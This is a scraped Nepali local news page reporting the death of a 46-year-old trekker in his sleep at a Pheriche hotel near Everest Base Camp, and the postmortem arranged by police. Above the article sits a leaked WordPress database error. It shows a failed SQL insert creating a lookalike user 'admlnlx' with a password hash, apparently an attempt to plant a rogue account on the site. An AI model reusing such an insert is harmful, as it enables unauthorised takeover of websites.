WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJ4pWIio0pAgFbMPeTMkp46i0AzKAv1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 02:23:36', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बु जिल्लाको खुम्बु पासङ ल्हमु गाउँपालीका ४ फेरुचेमा जगं बहादुर विश्वकर्माको बुधबार सुतेकै ठाउँमा ज्यान गएको छ ।
नाम्चेबाट सगरमाथा बेस क्याम्प तर्फ जाने क्रममा फेरुचे स्थित हिमालयन होटलमा बास बसेका माप्यदुधकोशी गाउपालीका ७ का ४६ बर्षिय विश्वकर्माको सुतेकै अवस्थामा ज्यान गएको सोलुुखुम्बु प्रहरीले जनाएको छ ।
घटनाको जानकारी पाए लगत्तै ईलाका प्रहरी कार्यलय नाम्चेबाट गएको प्रहरीले कानुनी प्रकृया पुरा गरी शवलाई निकोलनिकि अस्पतालमा लुक्ला राखिएको जनाएको छ । उक्त शवलाई पोष्ट मार्टमका लागी आज बिहिबार जिल्ला अस्पताल फाप्लु ल्याईने जिल्ला प्रहरी कार्यलय सोलुखुम्बुले जनाएको छ ।